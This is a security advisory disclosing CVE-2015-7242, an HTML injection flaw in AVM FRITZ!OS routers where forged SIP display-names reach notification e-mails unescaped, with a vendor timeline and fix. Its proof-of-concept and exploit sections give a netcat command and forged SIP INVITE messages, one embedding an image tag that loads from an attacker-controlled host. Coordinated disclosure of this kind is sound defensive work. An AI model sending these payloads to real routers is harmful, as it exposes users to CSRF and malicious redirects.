-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
                          Security Advisory
=======================================================================
              Title: HTML Injection Vulnerability
            Product: AVM FRITZ!OS
 Vulnerable Version: All versions prior to 6.30
      Fixed Version: 6.30
             CVE-ID: CVE-2015-7242
             Impact: medium
              found: 2015-06-02
                 by: Dr. Daniel Schliebner <mail@ds-develop.de>
                     http://www.ds-develop.de
=======================================================================

Vendor Description:
- -------------------
"AVM offers a wide range of products for high-speed broadband
connectivity and smart home networking. With the FRITZ! product family,
AVM is a leading manufacturer of broadband devices for ADSL, cable, and
LTE as well as Smart Home products for wireless LAN, DECT, and Powerline
in Germany and Europe. The FRITZ!Box is the best known brand for
wireless routers in Germany. In 2014 the communications specialist had
500 employees and generated a turnover of 340 million euros."
(http://en.avm.de/about-avm/)


Vulnerability Description:
- --------------------------
Current FRITZ!Box router with supported VoIP functionality have open
port 5060 in order to send and receive SIP messages for ip telephony. In
order to get noticed for incoming calls in absence, many such FRITZ!Box
can be set up to send notice e-mails to a user with the callers phone
number and its display-name (if given) inserted into the e-mail.

Due to intrinsic problems with SIP communication, a user agent client
(UAC), however, needs not to perform a VoIP call by using registrars but
can simply initiate an SIP call to another UAC which then has the role
of a user agent server (UAS).

When the UAC sends an INVITE message to the UAS coming with a valid
phone number, it initiates a ringing on the UAS. In this case, the
FRITZ!Box will send a notification e-mail as described above. It uses
the display-name and the phone number specified in the From: header for
the "who has called" information in the notification e-mail. However,
these information are not properly escaped so forged display-names will
be inserted invalidated into the e-mail.

This vulnerability can be exploited to perform e.g. CSRF attacks on the
client or similar by embedding <img> or <a> tags into the display-name
with an src attribute pointing to some malicious destination.

However, the good news is that attackers need to be creative here since
the length of the display-name is limited to 20 characters so the
embedded HTML code needs to be very short. Using appropriate, very short
URLs, however, can still be used to exploit this vulnerability in a
serious manner.

Informally, a possible attack would look as follows.

We start by finding a valid user's phone number by trying SIP OPTIONS
messages on the FRITZ!Box until we receive a

SIP/2.0 200 OK

response. We thus obtain the phone number and can send the forged INVITE
SIP message to the FRITZ!Box. As a result, the notification e-mail to
the end user will contain the unescaped sender's FROM display-name and
hence possibly embedded HTML code.


Proof of concept:
- -----------------
Assume a FRITZ!Box with WAN address 80.0.0.0 and an IP phone with number
493012345678 setup.

Step 1:
Initiate TCP connection to FRITZ!Box on port 5060, e.g. using Netcat:

$ nc 80.0.0.0 5060

Step 2:
Send forged SIP INVITE message as follows:

INVITE sip:493012345678@80.0.0.0 SIP/2.0
To: Alice <sip:493012345678@80.0.0.0>;tag=123
From: "<a href='#'>Bob</a>" <sip:4930111111111@sip.net>;tag=456
Call-ID: abc@foo.com
CSeq: 123456 INVITE
Via: SIP/2.0/TCP 80.0.0.0;branch=FOO
Content-Length: 0


Exploit:
- --------
In order to exploit the vulnerability, an attacker needs, for instance,
to insert a HTML tag which is short enough for an appropriate URL to be
inserted. An example would be for instance

INVITE sip:493012345678@80.0.0.0 SIP/2.0
To: Alice <sip:493012345678@80.0.0.0>;tag=123
From: "<img src=http:c.to>" <sip:4930111111111@sip.net>;tag=456
Call-ID: abc@foo.com
CSeq: 123456 INVITE
Via: SIP/2.0/TCP 80.0.0.0;branch=FOO
Content-Length: 0

The site c.to is here assumed to be either compromised by the attacker,
too, or under its control. In this case the attacker then can, for
instance redirect the user to another URL with malicious code or
using other exploits, e.g. the recent RCE/CSRF vulnerability in
FRITZ!OS, see [2], related to FRITZ!OS prior to 6.30.


Vulnerable / tested versions:
- -----------------------------
Fritz!Box 7390 with FRITZ!OS 6.24
Fritz!Box 7360 SL with FRITZ!OS 6.20


Vendor contact timeline:
- ------------------------
2015-06-02: Contacting vendor through info@avm.de
2015-06-04: Vendor response - vulnerability will be forwarded
2015-06-04: Vendor response - issue has now the incident-ID CID4191652
2015-06-05: Vulnerability advisory sent to vendor
2015-06-04: Vendor response - issue will be fixed
2015-07-01: Vendor response - Issue is fixed in upcoming Fritz!OS
06.25-30758
2015-07-13: Status update - Fritz!OS 6.30 deployment begin
2015-09-21: Contacted vendor to ask for deployment status of update
2015-09-22: Vendor response - update not currently deployed for all products
2016-01-07: Coordinated release of the security advisory


Solution:
- ---------
Escape HTML entities within the display-name in the From: header or do
not allow other characters than [a-z0-9\s] within the display-name.


References
- ----------
[1] https://avm.de/service/sicherheitshinweise/
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2015-001


URL
- ---
http://ds-develop.de/advisories/advisory-2016-01-07-1-avm.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
 
iQEcBAEBAgAGBQJWjqgtAAoJEFA4WIKLTb8OS3YH/1WuuyJw5h1JZjBEW78lz23f
4sy2n3XLBlQG5deVSjVYH1j6Sbh//5rcn0vUS12jOndOVJjtkgc8eZuM+Vsh5NXn
qnzagwMZXSeY5mnx6w5UQqzcX4XFv4gTuDzDCfYfqnnwHGHVU6zxuN09hSmGwGBO
psmuZCNTT9eT1BnJRYib7sPXBEBOzu+0AeL/sNuz84kIXeRbWjthaNPYCbdGMo62
QFxxltJvnpx18LVmcpJ6bfFfnDSFWT3GFANjBJSdhvR71QcUaArJ6nDADxT/ZE/A
eyH1IC0h5pbdUzbi2CdaPq2tdzPxHAYJJHjzX/pLkFgJgbAiWpvG5YVaCw7CWGc=
=27k0
-----END PGP SIGNATURE-----